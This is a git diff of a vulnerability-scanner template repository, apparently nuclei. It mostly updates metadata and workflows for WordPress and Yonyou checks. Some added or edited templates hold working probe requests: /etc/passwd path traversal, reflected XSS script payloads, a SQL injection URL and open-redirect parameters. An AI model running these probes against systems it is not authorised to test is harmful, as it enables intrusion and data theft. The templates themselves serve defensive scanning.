-      - "{{BaseURL}}/?aiowpsec_do_log_out=1&after_logout=https://attacker.com"
+      - "{{BaseURL}}/?aiowpsec_do_log_out=1&after_logout=https://interact.sh"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml b/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml
index c6fd4cc1a1..00a7847ee1 100644
--- a/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml
+++ b/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml
@@ -4,10 +4,10 @@ info:
   name: WordPress Plugin Sfwd-lms Listing
   author: pussycat0x
   severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  description: Searches for sensitive directories present in the sfwd-lms plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6426
-  tags: wordpress,listing,plugin
+  tags: wordpress,listing,plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml b/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml
index ce5ae50dd1..d491da37b7 100644
--- a/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml
@@ -1,12 +1,13 @@
 id: wp-simple-fields-lfi
 
 info:
-  name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
+  name: WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
   author: 0x240x23elu
   severity: high
+  description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution.
   reference:
     - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html
-  tags: wordpress,wp-plugin,lfi
+  tags: wp-plugin,lfi,packetstorm,wordpress
 
 requests:
   - method: GET
@@ -17,4 +18,6 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/vulnerabilities/wordpress/wp-slideshow-xss.yaml
index 49be6efa96..f6448d68dd 100644
--- a/vulnerabilities/wordpress/wp-slideshow-xss.yaml
+++ b/vulnerabilities/wordpress/wp-slideshow-xss.yaml
@@ -1,12 +1,12 @@
 id: wp-slideshow-xss
 
 info:
-  name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Plugin Slideshow - Cross-Site Scripting
   author: daffainfo
   severity: medium
   reference:
     - https://www.exploit-db.com/exploits/37948
-  tags: wordpress,xss,wp-plugin
+  tags: wordpress,xss,wp-plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/vulnerabilities/wordpress/wp-socialfit-xss.yaml
index 56b6690c8f..0ee001dd39 100644
--- a/vulnerabilities/wordpress/wp-socialfit-xss.yaml
+++ b/vulnerabilities/wordpress/wp-socialfit-xss.yaml
@@ -1,14 +1,18 @@
 id: wp-socialfit-xss
 
 info:
-  name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting
+  name: WordPress SocialFit - Cross-Site Scripting
   author: daffainfo
-  severity: medium
+  severity: high
   description: |
-    SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+    WordPress SocialFit is vulnerable to a cross-site scripting vulnerability via the 'msg' parameter because it fails to properly sanitize user-supplied input.
   reference:
     - https://www.exploit-db.com/exploits/37481
-  tags: wordpress,xss,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wordpress,xss,wp-plugin,edb
 
 requests:
   - method: GET
@@ -27,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml b/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml
index ba80c879e0..9f63edbf14 100644
--- a/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
     - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
-  tags: wordpress,backup
+  tags: wordpress,backup,wpscan
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-super-forms.yaml b/vulnerabilities/wordpress/wp-super-forms.yaml
index 836e6dc4a5..e50a2c149a 100644
--- a/vulnerabilities/wordpress/wp-super-forms.yaml
+++ b/vulnerabilities/wordpress/wp-super-forms.yaml
@@ -4,10 +4,10 @@ info:
   name: WordPress super-forms Plugin Directory Listing
   author: pussycat0x
   severity: low
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  description: Searches for sensitive directories present in the super-forms plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6776
-  tags: wordpress,listing,plugin
+  tags: listing,plugin,edb,wordpress
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-sym404.yaml b/vulnerabilities/wordpress/wp-sym404.yaml
new file mode 100644
index 0000000000..6211e06068
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-sym404.yaml
@@ -0,0 +1,29 @@
+id: wp-sym404
+
+info:
+  name: Wordpress sym404 directory
+  author: pussycat0x
+  severity: high
+  description: Searches for sensitive directories present in the sym404.
+  reference:
+    - https://twitter.com/momika233/status/1540325055280070656
+  metadata:
+    verified: true
+    google-query: inurl:"/wp-includes/sym404/"
+  tags: wordpress,listing,wp,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-includes/sym404/root/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wp-tinymce-lfi.yaml b/vulnerabilities/wordpress/wp-tinymce-lfi.yaml
index 3b5ed8a2b9..6c6221a21a 100644
--- a/vulnerabilities/wordpress/wp-tinymce-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-tinymce-lfi.yaml
@@ -1,13 +1,17 @@
 id: wp-tinymce-lfi
 
 info:
-  name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI
+  name: Tinymce Thumbnail Gallery <=1.0.7 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability.
+  description: Tinymce Thumbnail Gallery 1.0.7 and before are vulnerable to local file inclusion via download-image.php.
   reference:
     - https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
     - http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: wordpress,wp-theme,lfi,wordpress,tinymce
 
 requests:
@@ -27,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/wp-tutor-lfi.yaml b/vulnerabilities/wordpress/wp-tutor-lfi.yaml
index 904369eb6b..31a1ba7396 100644
--- a/vulnerabilities/wordpress/wp-tutor-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-tutor-lfi.yaml
@@ -1,12 +1,17 @@
 id: wp-tutor-lfi
 
 info:
-  name: WordPress Plugin tutor.1.5.3 - Local File Inclusion
+  name: WordPress tutor 1.5.3 - Local File Inclusion
   author: 0x240x23elu
   severity: high
+  description: WordPress tutor.1.5.3 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/48058
-  tags: wordpress,wp-plugin,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: wordpress,wp-plugin,lfi,edb
 
 requests:
   - method: GET
@@ -17,4 +22,6 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml b/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
index 2b8590d60e..f965a6c840 100644
--- a/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
+++ b/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
@@ -11,7 +11,7 @@ info:
     - https://packetstormsecurity.com/files/161576/
   metadata:
     verified: true
-  tags: ssrf,wp,wp-plugin,wordpress,unauth
+  tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm
 
 requests:
   - raw:
diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml
index a43984072a..ad366b15a7 100644
--- a/vulnerabilities/wordpress/wp-upload-data.yaml
+++ b/vulnerabilities/wordpress/wp-upload-data.yaml
@@ -1,29 +1,29 @@
-id: wordpress-upload-data
+id: wordpress-upload-data
 
-info:
-  name: wordpress-upload-data
-  author: pussycat0x
-  severity: medium
-  description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
-  reference: https://www.exploit-db.com/ghdb/7040
-  tags: wordpress,listing
+info:
+  name: wordpress-upload-data
+  author: pussycat0x
+  severity: medium
+  description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
+  reference: https://www.exploit-db.com/ghdb/7040
+  tags: wordpress,listing
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/uploads/data.txt"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "admin:"
-
-      - type: word
-        part: header
-        words:
-          - "text/plain"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/uploads/data.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "admin:"
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wp-vault-lfi.yaml b/vulnerabilities/wordpress/wp-vault-lfi.yaml
index 74c0c20b16..083cc7c49f 100644
--- a/vulnerabilities/wordpress/wp-vault-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-vault-lfi.yaml
@@ -1,12 +1,17 @@
 id: wp-vault-local-file-inclusion
 
 info:
-  name: WP Vault 0.8.6.6 Local File Inclusion
+  name: WordPress Vault 0.8.6.6 - Local File Inclusion
   author: 0x_Akoko
   severity: high
+  description: WordPress Vault 0.8.6.6 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/40850
-  tags: wp-plugin,wordpress,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,edb,wp-plugin,wordpress
 
 requests:
   - method: GET
@@ -23,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/wp-whmcs-xss.yaml b/vulnerabilities/wordpress/wp-whmcs-xss.yaml
deleted file mode 100644
index 69a4a54185..0000000000
--- a/vulnerabilities/wordpress/wp-whmcs-xss.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: wp-whmcs-xss
-
-info:
-  name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
-  author: dhiyaneshDk
-  severity: medium
-  description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
-  reference:
-    - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
-  tags: wordpress,wp-plugin,authenticated,whmcs,xss
-
-requests:
-  - raw:
-      - |
-        POST /wp-login.php HTTP/1.1
-        Host: {{Hostname}}
-        Origin: {{RootURL}}
-        Content-Type: application/x-www-form-urlencoded
-        Cookie: wordpress_test_cookie=WP%20Cookie%20check
-
-        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-      - |
-        GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
-        Host: {{Hostname}}
-
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<strong><img src onerror=alert(document.domain)></strong>"
-        condition: and
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml b/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml
index a0e3bfcb3a..cab4da6eb5 100644
--- a/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml
+++ b/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml
@@ -4,9 +4,16 @@ info:
   name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
   author: random_robbie,daffianfo
   severity: critical
+  description: |
+    Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2  contains a loose comparison issue which could allow any user to log in as administrator.
   reference:
     - https://wpvulndb.com/vulnerabilities/10318
-  tags: wordpress,wp-plugin,woocommerce
+    - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8
+  classification:
+    cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-288
+  tags: woocommerce,wp,wpscan,wordpress,wp-plugin
 
 requests:
   - method: GET
@@ -32,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/31
diff --git a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
index f3d8f59e94..fd5b21b167 100644
--- a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
+++ b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
@@ -1,19 +1,19 @@
 id: wp-woocommerce-file-download
 
 info:
-  name: WordPress WooCommerce < 1.2.7 - Arbitrary File Retrieval
+  name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
   author: 0x_Akoko
   severity: high
-  description: WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated
-    users to download arbitrary files from the blog using a path traversal payload.
-  reference:
+  description: |
+    WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
+  reference: |
     - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
     - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
     cwe-id: CWE-22
-  tags: wordpress,woocommerce,lfi
+  tags: wordpress,woocommerce,lfi,wp-plugin,wp
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wpdm-cache-session.yaml b/vulnerabilities/wordpress/wpdm-cache-session.yaml
index bb345d29f7..51acfbbbbe 100644
--- a/vulnerabilities/wordpress/wpdm-cache-session.yaml
+++ b/vulnerabilities/wordpress/wpdm-cache-session.yaml
@@ -6,7 +6,7 @@ info:
   severity: medium
   reference:
     - https://www.exploit-db.com/ghdb/7004
-  tags: wordpress
+  tags: wordpress,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml b/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml
new file mode 100644
index 0000000000..8c7e74a2b2
--- /dev/null
+++ b/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml
@@ -0,0 +1,35 @@
+id: wpify-woo-czech-xss
+
+info:
+  name: WPify Woo Czech < 3.5.7 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: The plugin uses the Vies library v2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first, leading to a Reflected Cross-Site Scripting. The issue is only exploitable when the web server has the PDO driver installed, and write access to the example directory (otherwise an exception will be raised before the payload is output)..
+  reference:
+    - https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c
+  metadata:
+    verified: true
+  tags: wp,wordpress,xss,wp-plugin,wpify,wpscan
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>alert(document.domain)</script>'
+          - 'Add a new VAT ID to the queue'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wpmudev-pub-keys.yaml b/vulnerabilities/wordpress/wpmudev-pub-keys.yaml
index 649ce1c6f4..660da19b6a 100644
--- a/vulnerabilities/wordpress/wpmudev-pub-keys.yaml
+++ b/vulnerabilities/wordpress/wpmudev-pub-keys.yaml
@@ -6,7 +6,7 @@ info:
   severity: medium
   reference:
     - https://www.exploit-db.com/ghdb/6443
-  tags: wordpress
+  tags: wordpress,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wptouch-open-redirect.yaml b/vulnerabilities/wordpress/wptouch-open-redirect.yaml
index c33b1c8765..c5362a4ad1 100644
--- a/vulnerabilities/wordpress/wptouch-open-redirect.yaml
+++ b/vulnerabilities/wordpress/wptouch-open-redirect.yaml
@@ -19,10 +19,10 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/"
+      - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/vulnerabilities/other/erp-nc-directory-traversal.yaml b/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml
similarity index 67%
rename from vulnerabilities/other/erp-nc-directory-traversal.yaml
rename to vulnerabilities/yonyou/erp-nc-directory-traversal.yaml
index 1bbf80ae2c..bb4d677333 100644
--- a/vulnerabilities/other/erp-nc-directory-traversal.yaml
+++ b/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml
@@ -1,11 +1,16 @@
 id: erp-nc-directory-traversal
 
 info:
-  name: ERP-NC directory traversal
+  name: ERP-NC - Local File Inclusion
   author: pikpikcu
   severity: high
+  description: ERP-NC is vulnerable to local file inclusion.
   reference:
     - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: lfi,erp-nc
 
 requests:
@@ -26,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/other/wooyun-path-traversal.yaml b/vulnerabilities/yonyou/wooyun-path-traversal.yaml
similarity index 69%
rename from vulnerabilities/other/wooyun-path-traversal.yaml
rename to vulnerabilities/yonyou/wooyun-path-traversal.yaml
index 32f0591370..bdc5b2284a 100644
--- a/vulnerabilities/other/wooyun-path-traversal.yaml
+++ b/vulnerabilities/yonyou/wooyun-path-traversal.yaml
@@ -1,15 +1,17 @@
 id: wooyun-path-traversal
 
 info:
-  name: Wooyun Path Traversal
+  name: Wooyun - Local File Inclusion
   author: pikpikcu
   severity: high
   description: |
-    A general document of UFIDA ERP-NC contains a vulnerability
-    (affecting a large number of well-known school government and enterprise cases
-    such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
+    Wooyun is vulnerable to local file inclusion.
   reference:
     - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: lfi,wooyun
 
 requests:
@@ -28,3 +30,5 @@ requests:
           - </DataSourceClassName>
         part: body
         condition: and
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/other/yonyou-u8-oa-sqli.yaml b/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml
similarity index 76%
rename from vulnerabilities/other/yonyou-u8-oa-sqli.yaml
rename to vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml
index e65cbf9cab..312e2d95f2 100644
--- a/vulnerabilities/other/yonyou-u8-oa-sqli.yaml
+++ b/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml
@@ -8,17 +8,20 @@ info:
     - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
   tags: yonyou,oa,sqli
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))"
+      - '{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))'
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '{{md5("{{randstr}}")}}'
+          - '{{md5({{num}})}}'
 
       - type: status
         status:
diff --git a/workflows/azure-workflow.yaml b/workflows/azure-workflow.yaml
new file mode 100644
index 0000000000..ff106ce9ae
--- /dev/null
+++ b/workflows/azure-workflow.yaml
@@ -0,0 +1,9 @@
+id: azure-workflow
+
+info:
+  name: Azure Checks
+  author: DhiyaneshDk
+  description: A simple workflow that runs all Azure related nuclei templates on a given target.
+
+workflows:
+  - tags: azure
diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml
index bdf4e83b20..9e3b04a9f6 100644
--- a/workflows/dell-idrac-workflow.yaml
+++ b/workflows/dell-idrac-workflow.yaml
@@ -1,4 +1,5 @@
 id: dell-idrac-workflow
+
 info:
   name: Dell iDRAC Security Checks
   author: kophjager007
@@ -19,4 +20,4 @@ workflows:
 
   - template: technologies/dell/dell-idrac9-detect.yaml
     subtemplates:
-      - template: default-logins/dell/dell-idrac9-default-login.yaml
\ No newline at end of file
+      - template: default-logins/dell/dell-idrac9-default-login.yaml
diff --git a/workflows/emerge-workflow.yaml b/workflows/emerge-workflow.yaml
new file mode 100644
index 0000000000..b7a0e97272
--- /dev/null
+++ b/workflows/emerge-workflow.yaml
@@ -0,0 +1,9 @@
+id: emerge-workflow
+
+info:
+  name: eMerge Checks
+  author: DhiyaneshDk
+  description: A simple workflow that runs all eMerge related nuclei templates on a given target.
+
+workflows:
+  - tags: emerge
diff --git a/workflows/gocd-workflow.yaml b/workflows/gocd-workflow.yaml
index 561cecc9a6..7f69fdf1dd 100644
--- a/workflows/gocd-workflow.yaml
+++ b/workflows/gocd-workflow.yaml
@@ -1,4 +1,5 @@
 id: gocd-workflow
+
 info:
   name: GoCD Security Checks
   author: dhiyaneshDk
@@ -7,4 +8,4 @@ info:
 workflows:
   - template: exposed-panels/gocd-login.yaml
     subtemplates:
-      - tags: gocd
\ No newline at end of file
+      - tags: gocd
diff --git a/workflows/jellyfin-workflow.yaml b/workflows/jellyfin-workflow.yaml
index 126b6dbc0e..0b116ac430 100644
--- a/workflows/jellyfin-workflow.yaml
+++ b/workflows/jellyfin-workflow.yaml
@@ -1,4 +1,5 @@
 id: jellyfin-workflow
+
 info:
   name: Jellyfin Security Checks
   author: dwisiswant0
@@ -8,4 +9,4 @@ workflows:
   - template: technologies/jellyfin-detect.yaml
     subtemplates:
       - template: cves/2020/CVE-2020-26948.yaml
-      - template: cves/2021/CVE-2021-21402.yaml
\ No newline at end of file
+      - template: cves/2021/CVE-2021-21402.yaml
diff --git a/workflows/joomla-workflow.yaml b/workflows/joomla-workflow.yaml
index 077185c1ca..5bc2af54ba 100644
--- a/workflows/joomla-workflow.yaml
+++ b/workflows/joomla-workflow.yaml
@@ -3,7 +3,7 @@ id: joomla-workflow
 info:
   name: Joomla! Security Checks
   author: daffainfo
-  description: A simple workflow that runs all Joomla related nuclei templates on a given target.
+  description: A simple workflow that runs all Joomla! related nuclei templates on a given target.
 
 workflows:
   - template: technologies/tech-detect.yaml
diff --git a/workflows/magento-workflow.yaml b/workflows/magento-workflow.yaml
index 24e15e9433..2bfe4efe3a 100644
--- a/workflows/magento-workflow.yaml
+++ b/workflows/magento-workflow.yaml
@@ -8,6 +8,4 @@ info:
 workflows:
   - template: technologies/magento-detect.yaml
     subtemplates:
-      - template: exposures/configs/magento-config.yaml
-      - template: exposed-panels/magento-admin-panel.yaml
-      - template: vulnerabilities/magento/
\ No newline at end of file
+      - tags: magento
\ No newline at end of file
diff --git a/workflows/symfony-workflow.yaml b/workflows/symfony-workflow.yaml
index a8a5d7c69d..dbaf450317 100644
--- a/workflows/symfony-workflow.yaml
+++ b/workflows/symfony-workflow.yaml
@@ -1,4 +1,5 @@
 id: symfony-workflow
+
 info:
   name: Symfony Security Checks
   author: daffainfo
@@ -9,4 +10,4 @@ workflows:
     matchers:
       - name: symfony
         subtemplates:
-          - tags: symfony
\ No newline at end of file
+          - tags: symfony
diff --git a/workflows/thinkcmf-workflow.yaml b/workflows/thinkcmf-workflow.yaml
index 434483bb2c..199535db5e 100644
--- a/workflows/thinkcmf-workflow.yaml
+++ b/workflows/thinkcmf-workflow.yaml
@@ -1,4 +1,5 @@
 id: thinkcmf-workflow
+
 info:
   name: ThinkCMF Security Checks
   author: pdteam
@@ -7,4 +8,4 @@ info:
 workflows:
   - template: technologies/thinkcmf-detect.yaml
     subtemplates:
-      - tags: thinkcmf
\ No newline at end of file
+      - tags: thinkcmf
diff --git a/workflows/thinkphp-workflow.yaml b/workflows/thinkphp-workflow.yaml
index d09366bb61..2a935fe989 100644
--- a/workflows/thinkphp-workflow.yaml
+++ b/workflows/thinkphp-workflow.yaml
@@ -1,4 +1,5 @@
 id: thinkphp-workflow
+
 info:
   name: ThinkPHP Security Checks
   author: dr_set
@@ -9,4 +10,4 @@ workflows:
     matchers:
       - name: thinkphp
         subtemplates:
-          - tags: thinkphp
\ No newline at end of file
+          - tags: thinkphp
diff --git a/workflows/weblogic-workflow.yaml b/workflows/weblogic-workflow.yaml
index fcca4c6bd8..f8903eb960 100644
--- a/workflows/weblogic-workflow.yaml
+++ b/workflows/weblogic-workflow.yaml
@@ -1,11 +1,12 @@
-id: weblogic-workflow
-info:
-  name: WebLogic Security Checks
-  author: dr_set
-  description: A simple workflow that runs all WebLogic related nuclei templates on a given target.
-
-workflows:
-  - template: technologies/weblogic-detect.yaml
-
-    subtemplates:
-      - tags: weblogic
\ No newline at end of file
+id: weblogic-workflow
+
+info:
+  name: WebLogic Security Checks
+  author: dr_set
+  description: A simple workflow that runs all WebLogic related nuclei templates on a given target.
+
+workflows:
+  - template: technologies/weblogic-detect.yaml
+
+    subtemplates:
+      - tags: weblogic
diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml
index 86bf5b16db..2fd05f8bab 100644
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@@ -1,4 +1,5 @@
 id: wordpress-workflow
+
 info:
   name: Wordpress Security Checks
   author: kiblyn11,zomsop82
@@ -8,4 +9,4 @@ workflows:
 
   - template: technologies/wordpress-detect.yaml
     subtemplates:
-      - tags: wordpress
\ No newline at end of file
+      - tags: wordpress
diff --git a/workflows/yonyou-nc-workflow.yaml b/workflows/yonyou-nc-workflow.yaml
index 4d0e27a715..e725d45706 100644
--- a/workflows/yonyou-nc-workflow.yaml
+++ b/workflows/yonyou-nc-workflow.yaml
@@ -3,11 +3,11 @@ id: yonyou-ufida-nc-workflow
 info:
   name: Yonyou Ufida NC Security Checks
   author: Arm!tage
-  description: A simple workflow that runs all yonyou ufida nc related nuclei templates on a given target.
+  description: A simple workflow that runs all Yonyou Network Technology Co. (Ufida) NC related nuclei templates on a given target.
 
 workflows:
   - template: technologies/fingerprinthub-web-fingerprints.yaml
     matchers:
       - name: yonyou-ism
         subtemplates:
-          - tags: yonyou
\ No newline at end of file
+          - tags: yonyou